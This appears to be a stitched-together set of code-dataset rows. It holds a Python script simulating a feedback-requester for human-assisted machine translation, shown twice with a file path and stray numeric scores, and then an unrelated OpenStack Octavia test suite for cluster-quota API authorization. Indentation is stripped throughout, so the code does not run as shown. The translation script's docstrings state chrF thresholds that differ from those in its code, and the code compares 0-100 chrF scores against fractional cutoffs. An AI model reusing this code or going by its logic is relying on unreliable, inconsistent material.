from hnmt.feedback_requester.model import LSTMClassifier
from hnmt.feedback_requester.learned_sampling_AL.model import LearnedALSamplingLSTMClassifier
from hnmt.feedback_requester.data import collate_pad_with_gold_text
from hnmt.feedback_requester.update import POST_FEEDBACK_STRUCT, calculate_post_edited_loss, \
update_model, update_learned_al_model
def main(
threshold: float,
model_path: str,
docs_path: str,
online_learning: bool = False,
policy: int = 1,
active_learning: bool = False,
al_strategy: str = 'entropy'
):
if al_strategy == 'learned_sampling':
model = LearnedALSamplingLSTMClassifier(1586, 1586)
else:
model = LSTMClassifier(1586, 1586)
model.load_state_dict(torch.load(model_path))
model.eval()
optimizer = optim.Adam(model.parameters())
effort_scores = []
bleu_scores = []
chrf_scores = []
orig_bleu = []
orig_chrf = []
precent_sents_requested = []
with open(docs_path, "rb") as f:
documents = pickle.load(f)
for document in documents:
dataloader = DataLoader(document, batch_size=16, shuffle=False, num_workers=0,
collate_fn=collate_pad_with_gold_text, pin_memory=True)
document_effort = 0
gold_translations = [x[2] for x in document]
post_interactive = []
all_sys_obj_predictions = torch.empty(0)
total_requested = 0
post_edited = []
for batch in dataloader:
if al_strategy == 'learned_sampling':
predictions, sys_obj_predictions = model(batch[0])
predictions = predictions.squeeze()
sys_obj_predictions = sys_obj_predictions.squeeze()
all_sys_obj_predictions = torch.cat((all_sys_obj_predictions, sys_obj_predictions))
else:
predictions = model(batch[0]).squeeze()
for i, prediction in enumerate(predictions):
nmt_hypo = batch[1][i]
gold_translation = batch[2][i]
sys_obj_pred = sys_obj_predictions[i] if al_strategy == 'learned_sampling' else None
request_feedback = should_request_feedback(threshold, prediction, active_learning,
al_strategy, sys_obj_pred)
if request_feedback:
total_requested += 1
sent_effort_score, final_sent = do_policy_feedback_and_post_edit(nmt_hypo,
gold_translation,
policy)
document_effort += sent_effort_score
feedback = get_prompted_feedback(online_learning, prediction, nmt_hypo, final_sent)
post_interactive.append(feedback)
else:
no_feedback_struct = get_unprompted_struct(online_learning, prediction, nmt_hypo)
post_interactive.append(no_feedback_struct)
if online_learning:
posted_edited_sent = policy_post_edit_for_updating(nmt_hypo, gold_translation, policy)
post_edited.append(posted_edited_sent)
doc_bleu_score, doc_chrf_score = calculate_bleu_and_chrf_scores(post_interactive,
online_learning,
gold_translations)
effort_scores.append(document_effort)
bleu_scores.append(doc_bleu_score)
chrf_scores.append(doc_chrf_score)
orig_out_bleu, orig_out_chrf, percent_requested = calculate_additional_stats(document,
gold_translations,
total_requested)
orig_bleu.append(orig_out_bleu)
orig_chrf.append(orig_out_chrf)
precent_sents_requested.append(percent_requested)
if online_learning:
if al_strategy == 'learned_sampling':
update_learned_al_model(model, optimizer, post_interactive, post_edited, all_sys_obj_predictions)
else:
update_model(model, optimizer, post_interactive, post_edited)
current_dir = os.path.dirname(os.path.realpath(__file__))
name = f"online_updated_policy={policy}_al={active_learning}_ALstrategy={al_strategy}.pt"
weights_updated_path = current_dir + "/saved_state_dicts/" + name
torch.save(model.state_dict(), weights_updated_path)
print("\nModel weights saved at {}.\n".format(weights_updated_path))
return {
'ksmr': normalize_effort_scores(effort_scores),
'post_feedback_bleu': bleu_scores,
'post_feedback_chrf': chrf_scores,
'orig_nmt_out_bleu': orig_bleu,
'orig_nmt_out_chrf': orig_chrf,
'percent_sent_requested': precent_sents_requested
}
def should_request_feedback(
threshold: float,
prediction: torch.Tensor,
active_learning: bool,
al_strategy: str,
sys_pred: torch.Tensor
) -> bool:
if active_learning:
if al_strategy == 'entropy':
return 0.5 * calculate_entropy(prediction) + 0.7 * prediction >= threshold
elif al_strategy == 'learned_sampling':
return 10 * sys_pred + 0.6 * prediction >= threshold
else:
raise ValueError(f'Unsupported active learning strategy {al_strategy}')
return prediction >= threshold
def calculate_additional_stats(
document: List[Tuple[torch.Tensor, str, str]],
gold_translations: List[str],
total_requested: int
):
nmt_out_sents = [x[1] for x in document]
original_nmt_output_bleu = sacrebleu.corpus_bleu(nmt_out_sents, [gold_translations], lowercase=True).score
original_nmt_output_chrf = sacrebleu.corpus_chrf(nmt_out_sents, [gold_translations]).score
percent_requested = total_requested / len(document)
return original_nmt_output_bleu, original_nmt_output_chrf, percent_requested
def get_prompted_feedback(
online_learning: bool,
prediction: torch.Tensor,
nmt_hypo: str,
final_sent: str
) -> Union[str, POST_FEEDBACK_STRUCT]:
if online_learning:
return (prediction, 1, nmt_hypo, final_sent)
return final_sent
def get_unprompted_struct(
online_learning: bool,
prediction: torch.Tensor,
nmt_hypo: str
) -> Union[str, POST_FEEDBACK_STRUCT]:
if online_learning:
return (prediction, 0, nmt_hypo, nmt_hypo)
return nmt_hypo
def calculate_bleu_and_chrf_scores(
post_interactive: Union[List[str], List[POST_FEEDBACK_STRUCT]],
online_learning: bool,
gold_translations: List[str]
) -> Tuple[float, float]:
if online_learning:
references = [x[3] for x in post_interactive]
else:
references = post_interactive
bleu_score = sacrebleu.corpus_bleu(references, [gold_translations], lowercase=True).score
chrf_score = sacrebleu.corpus_chrf(references, [gold_translations]).score
return bleu_score, chrf_score
def do_policy_feedback_and_post_edit(
nmt_hypo: str,
gold_translation: str,
policy: int
) -> Tuple[float, str]:
"""
Return the sentence effort score and the final translation based on the policy.
Policy #1: the translator will fully correct each sentence always (when prompted or post-editing)
Policy #2: if asked by the feedback-requester and the chrF score is <= 0.95: fix/replace
if not asked by the feedback-requester (i.e. post-editing) and the chrF score is <= 0.70: fix/replace
"""
if policy == 1:
sent_effort_score = calculate_effort(nmt_hypo, gold_translation)
return sent_effort_score, gold_translation
else:
chrf_score = sacrebleu.sentence_chrf(nmt_hypo, [gold_translation]).score
if chrf_score <= 0.75:
sent_effort_score = calculate_effort(nmt_hypo, gold_translation)
return sent_effort_score, gold_translation
else:
sent_effort_score = calculate_effort(nmt_hypo, nmt_hypo)
return sent_effort_score, nmt_hypo
def policy_post_edit_for_updating(
nmt_hypo: str,
gold_translation: str,
policy: int
) -> str:
"""
Policy #1: the translator will fully correct each sentence always (when prompted or post-editing)
Policy #2: if not asked by the feedback-requester (i.e. post-editing) and the chrF score is <= 0.70: fix/replace
"""
if policy == 1:
return gold_translation
else:
chrf_score = sacrebleu.sentence_chrf(nmt_hypo, [gold_translation]).score
if chrf_score <= 0.60:
return gold_translation
return nmt_hypo
if __name__ == "__main__":
current_dir = os.path.dirname(os.path.realpath(__file__))
MODEL_PATH = '/Users/paigefink/human-assisted-nmt/hnmt/feedback_requester/saved_state_dicts/baseline/epoch_4.pt'
LEARNED_AL_MODEL_PATH = '/Users/paigefink/human-assisted-nmt/hnmt/feedback_requester/learned_sampling_AL/saved_state_dicts/epoch_4.pt'
DOCS_PATH = current_dir + "/preprocessed_docs/docs_60k_sents.p"
policy_1_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=False)
with open(current_dir + "/scores_pol_1.p", 'wb') as f:
pickle.dump(policy_1_stats, f)
policy_2_stats = main(0.5, MODEL_PATH, DOCS_PATH, policy=2, online_learning=False)
with open(current_dir + "/scores_pol_2.p", 'wb') as f:
pickle.dump(policy_2_stats, f)
policy_2_online_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=True,
policy=2, active_learning=False)
with open(current_dir + "/scores_pol_2_online.p", 'wb') as f:
pickle.dump(policy_2_online_stats, f)
policy_2_AL_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=True, policy=2,
active_learning=True, al_strategy="entropy")
with open(current_dir + "/scores_pol_2_AL.p", 'wb') as f:
pickle.dump(policy_2_AL_stats, f)
policy_2_learned_sampling_AL_stats = main(0.5,
LEARNED_AL_MODEL_PATH,
DOCS_PATH,
online_learning=True,
policy=2,
active_learning=True,
al_strategy="learned_sampling")
with open(current_dir + "/scores_pol_2_learned_AL.p", 'wb') as f:
pickle.dump(policy_2_learned_sampling_AL_stats, f) | hnmt/feedback_requester/experiments/simulate_feedback_requester_use.py | import os
import sys
import pickle
from typing import List, Tuple, Union
from difflib import ndiff
import torch
from torch.utils.data import DataLoader
import torch.optim as optim
import sentencepiece as spm
import sacrebleu
from hnmt.feedback_requester.util import calculate_entropy
from hnmt.utils import calculate_effort, normalize_effort_scores
from hnmt.nmt.main import get_document_nmt_output
from hnmt.feedback_requester.model import LSTMClassifier
from hnmt.feedback_requester.learned_sampling_AL.model import LearnedALSamplingLSTMClassifier
from hnmt.feedback_requester.data import collate_pad_with_gold_text
from hnmt.feedback_requester.update import POST_FEEDBACK_STRUCT, calculate_post_edited_loss, \
update_model, update_learned_al_model
def main(
threshold: float,
model_path: str,
docs_path: str,
online_learning: bool = False,
policy: int = 1,
active_learning: bool = False,
al_strategy: str = 'entropy'
):
if al_strategy == 'learned_sampling':
model = LearnedALSamplingLSTMClassifier(1586, 1586)
else:
model = LSTMClassifier(1586, 1586)
model.load_state_dict(torch.load(model_path))
model.eval()
optimizer = optim.Adam(model.parameters())
effort_scores = []
bleu_scores = []
chrf_scores = []
orig_bleu = []
orig_chrf = []
precent_sents_requested = []
with open(docs_path, "rb") as f:
documents = pickle.load(f)
for document in documents:
dataloader = DataLoader(document, batch_size=16, shuffle=False, num_workers=0,
collate_fn=collate_pad_with_gold_text, pin_memory=True)
document_effort = 0
gold_translations = [x[2] for x in document]
post_interactive = []
all_sys_obj_predictions = torch.empty(0)
total_requested = 0
post_edited = []
for batch in dataloader:
if al_strategy == 'learned_sampling':
predictions, sys_obj_predictions = model(batch[0])
predictions = predictions.squeeze()
sys_obj_predictions = sys_obj_predictions.squeeze()
all_sys_obj_predictions = torch.cat((all_sys_obj_predictions, sys_obj_predictions))
else:
predictions = model(batch[0]).squeeze()
for i, prediction in enumerate(predictions):
nmt_hypo = batch[1][i]
gold_translation = batch[2][i]
sys_obj_pred = sys_obj_predictions[i] if al_strategy == 'learned_sampling' else None
request_feedback = should_request_feedback(threshold, prediction, active_learning,
al_strategy, sys_obj_pred)
if request_feedback:
total_requested += 1
sent_effort_score, final_sent = do_policy_feedback_and_post_edit(nmt_hypo,
gold_translation,
policy)
document_effort += sent_effort_score
feedback = get_prompted_feedback(online_learning, prediction, nmt_hypo, final_sent)
post_interactive.append(feedback)
else:
no_feedback_struct = get_unprompted_struct(online_learning, prediction, nmt_hypo)
post_interactive.append(no_feedback_struct)
if online_learning:
posted_edited_sent = policy_post_edit_for_updating(nmt_hypo, gold_translation, policy)
post_edited.append(posted_edited_sent)
doc_bleu_score, doc_chrf_score = calculate_bleu_and_chrf_scores(post_interactive,
online_learning,
gold_translations)
effort_scores.append(document_effort)
bleu_scores.append(doc_bleu_score)
chrf_scores.append(doc_chrf_score)
orig_out_bleu, orig_out_chrf, percent_requested = calculate_additional_stats(document,
gold_translations,
total_requested)
orig_bleu.append(orig_out_bleu)
orig_chrf.append(orig_out_chrf)
precent_sents_requested.append(percent_requested)
if online_learning:
if al_strategy == 'learned_sampling':
update_learned_al_model(model, optimizer, post_interactive, post_edited, all_sys_obj_predictions)
else:
update_model(model, optimizer, post_interactive, post_edited)
current_dir = os.path.dirname(os.path.realpath(__file__))
name = f"online_updated_policy={policy}_al={active_learning}_ALstrategy={al_strategy}.pt"
weights_updated_path = current_dir + "/saved_state_dicts/" + name
torch.save(model.state_dict(), weights_updated_path)
print("\nModel weights saved at {}.\n".format(weights_updated_path))
return {
'ksmr': normalize_effort_scores(effort_scores),
'post_feedback_bleu': bleu_scores,
'post_feedback_chrf': chrf_scores,
'orig_nmt_out_bleu': orig_bleu,
'orig_nmt_out_chrf': orig_chrf,
'percent_sent_requested': precent_sents_requested
}
def should_request_feedback(
threshold: float,
prediction: torch.Tensor,
active_learning: bool,
al_strategy: str,
sys_pred: torch.Tensor
) -> bool:
if active_learning:
if al_strategy == 'entropy':
return 0.5 * calculate_entropy(prediction) + 0.7 * prediction >= threshold
elif al_strategy == 'learned_sampling':
return 10 * sys_pred + 0.6 * prediction >= threshold
else:
raise ValueError(f'Unsupported active learning strategy {al_strategy}')
return prediction >= threshold
def calculate_additional_stats(
document: List[Tuple[torch.Tensor, str, str]],
gold_translations: List[str],
total_requested: int
):
nmt_out_sents = [x[1] for x in document]
original_nmt_output_bleu = sacrebleu.corpus_bleu(nmt_out_sents, [gold_translations], lowercase=True).score
original_nmt_output_chrf = sacrebleu.corpus_chrf(nmt_out_sents, [gold_translations]).score
percent_requested = total_requested / len(document)
return original_nmt_output_bleu, original_nmt_output_chrf, percent_requested
def get_prompted_feedback(
online_learning: bool,
prediction: torch.Tensor,
nmt_hypo: str,
final_sent: str
) -> Union[str, POST_FEEDBACK_STRUCT]:
if online_learning:
return (prediction, 1, nmt_hypo, final_sent)
return final_sent
def get_unprompted_struct(
online_learning: bool,
prediction: torch.Tensor,
nmt_hypo: str
) -> Union[str, POST_FEEDBACK_STRUCT]:
if online_learning:
return (prediction, 0, nmt_hypo, nmt_hypo)
return nmt_hypo
def calculate_bleu_and_chrf_scores(
post_interactive: Union[List[str], List[POST_FEEDBACK_STRUCT]],
online_learning: bool,
gold_translations: List[str]
) -> Tuple[float, float]:
if online_learning:
references = [x[3] for x in post_interactive]
else:
references = post_interactive
bleu_score = sacrebleu.corpus_bleu(references, [gold_translations], lowercase=True).score
chrf_score = sacrebleu.corpus_chrf(references, [gold_translations]).score
return bleu_score, chrf_score
def do_policy_feedback_and_post_edit(
nmt_hypo: str,
gold_translation: str,
policy: int
) -> Tuple[float, str]:
"""
Return the sentence effort score and the final translation based on the policy.
Policy #1: the translator will fully correct each sentence always (when prompted or post-editing)
Policy #2: if asked by the feedback-requester and the chrF score is <= 0.95: fix/replace
if not asked by the feedback-requester (i.e. post-editing) and the chrF score is <= 0.70: fix/replace
"""
if policy == 1:
sent_effort_score = calculate_effort(nmt_hypo, gold_translation)
return sent_effort_score, gold_translation
else:
chrf_score = sacrebleu.sentence_chrf(nmt_hypo, [gold_translation]).score
if chrf_score <= 0.75:
sent_effort_score = calculate_effort(nmt_hypo, gold_translation)
return sent_effort_score, gold_translation
else:
sent_effort_score = calculate_effort(nmt_hypo, nmt_hypo)
return sent_effort_score, nmt_hypo
def policy_post_edit_for_updating(
nmt_hypo: str,
gold_translation: str,
policy: int
) -> str:
"""
Policy #1: the translator will fully correct each sentence always (when prompted or post-editing)
Policy #2: if not asked by the feedback-requester (i.e. post-editing) and the chrF score is <= 0.70: fix/replace
"""
if policy == 1:
return gold_translation
else:
chrf_score = sacrebleu.sentence_chrf(nmt_hypo, [gold_translation]).score
if chrf_score <= 0.60:
return gold_translation
return nmt_hypo
if __name__ == "__main__":
current_dir = os.path.dirname(os.path.realpath(__file__))
MODEL_PATH = '/Users/paigefink/human-assisted-nmt/hnmt/feedback_requester/saved_state_dicts/baseline/epoch_4.pt'
LEARNED_AL_MODEL_PATH = '/Users/paigefink/human-assisted-nmt/hnmt/feedback_requester/learned_sampling_AL/saved_state_dicts/epoch_4.pt'
DOCS_PATH = current_dir + "/preprocessed_docs/docs_60k_sents.p"
policy_1_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=False)
with open(current_dir + "/scores_pol_1.p", 'wb') as f:
pickle.dump(policy_1_stats, f)
policy_2_stats = main(0.5, MODEL_PATH, DOCS_PATH, policy=2, online_learning=False)
with open(current_dir + "/scores_pol_2.p", 'wb') as f:
pickle.dump(policy_2_stats, f)
policy_2_online_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=True,
policy=2, active_learning=False)
with open(current_dir + "/scores_pol_2_online.p", 'wb') as f:
pickle.dump(policy_2_online_stats, f)
policy_2_AL_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=True, policy=2,
active_learning=True, al_strategy="entropy")
with open(current_dir + "/scores_pol_2_AL.p", 'wb') as f:
pickle.dump(policy_2_AL_stats, f)
policy_2_learned_sampling_AL_stats = main(0.5,
LEARNED_AL_MODEL_PATH,
DOCS_PATH,
online_learning=True,
policy=2,
active_learning=True,
al_strategy="learned_sampling")
with open(current_dir + "/scores_pol_2_learned_AL.p", 'wb') as f:
pickle.dump(policy_2_learned_sampling_AL_stats, f) | 0.52683 | 0.22531 |
import random
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
CONF = cfg.CONF
class TestClusterQuotas(base.BaseAPITest):
root_tag = 'clusterquota'
def setUp(self):
super(TestClusterQuotas, self).setUp()
conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
conf.config(
group="clusterquotas",
cluster_total_loadbalancers=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_healthmonitors_per_pool=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_listeners_per_loadbalancer=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
# We need to make sure unlimited gets tested each pass
conf.config(
group="clusterquotas",
max_members_per_pool=constants.QUOTA_UNLIMITED)
conf.config(
group="clusterquotas",
max_pools_per_loadbalancer=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_l7policies_per_listener=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_l7rules_per_l7policy=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
def _assert_clusterquotas_equal(self, observed, expected=None):
if not expected:
expected = {'cluster_total_loadbalancers':
CONF.clusterquotas.cluster_total_loadbalancers,
'max_healthmonitors_per_pool':
CONF.clusterquotas.max_healthmonitors_per_pool,
'max_listeners_per_loadbalancer':
CONF.clusterquotas.max_listeners_per_loadbalancer,
'max_members_per_pool':
CONF.clusterquotas.max_members_per_pool,
'max_pools_per_loadbalancer':
CONF.clusterquotas.max_pools_per_loadbalancer,
'max_l7policies_per_listener':
CONF.clusterquotas.max_l7policies_per_listener,
'max_l7rules_per_l7policy':
CONF.clusterquotas.max_l7rules_per_l7policy}
self.assertEqual(expected['cluster_total_loadbalancers'],
observed['cluster_total_loadbalancers'])
self.assertEqual(expected['max_healthmonitors_per_pool'],
observed['max_healthmonitors_per_pool'])
self.assertEqual(expected['max_listeners_per_loadbalancer'],
observed['max_listeners_per_loadbalancer'])
self.assertEqual(expected['max_members_per_pool'],
observed['max_members_per_pool'])
self.assertEqual(expected['max_pools_per_loadbalancer'],
observed['max_pools_per_loadbalancer'])
self.assertEqual(expected['max_l7policies_per_listener'],
observed['max_l7policies_per_listener'])
self.assertEqual(expected['max_l7rules_per_l7policy'],
observed['max_l7rules_per_l7policy'])
def test_get(self):
clusterquota1 = self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH
).json.get(self.root_tag)
self._assert_clusterquotas_equal(clusterquotas, clusterquota1)
def test_get_Authorized_admin(self):
self._test_get_Authorized('load-balancer_admin')
def _test_get_Authorized(self, role):
project1_id = uuidutils.generate_uuid()
clusterquota1 = self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': [role],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH
).json.get(self.root_tag)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self._assert_clusterquotas_equal(clusterquotas, clusterquota1)
def test_get_not_Authorized(self):
self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
clusterquotas = self.get(self.CLUSTERQUOTAS_PATH,
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)
def test_get_not_Authorized_bogus_role(self):
project1_id = uuidutils.generate_uuid()
self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer:bogus'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH,
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)
def test_get_not_Authorized_no_role(self):
project1_id = uuidutils.generate_uuid()
self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': [],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH,
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)
def test_get_default_clusterquotas(self):
response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
def test_get_default_clusterquotas_Authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_get_default_clusterquotas_not_Authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
uuidutils.generate_uuid()):
response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH,
status=403)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_custom_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
def test_custom_clusterquotas_admin(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.put(clusterquota_path, body, status=202)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
def test_custom_clusterquotas_not_Authorized_member(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.put(clusterquota_path, body, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_custom_partial_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': None,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
expected_body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer':
CONF.clusterquotas.max_listeners_per_loadbalancer,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=expected_body['clusterquota']
)
def test_custom_missing_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
expected_body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer':
CONF.clusterquotas.max_listeners_per_loadbalancer,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=expected_body['clusterquota']
)
def test_delete_custom_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
self.delete(clusterquota_path, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
def test_delete_custom_clusterquotas_admin(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
